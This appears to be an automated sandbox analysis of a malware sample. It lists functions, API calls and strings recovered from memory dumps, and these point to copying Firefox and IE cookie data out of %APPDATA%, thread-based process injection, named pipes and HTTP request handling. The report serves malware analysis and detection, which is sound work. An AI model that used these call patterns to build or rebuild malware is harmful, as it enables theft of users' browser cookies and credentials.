  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
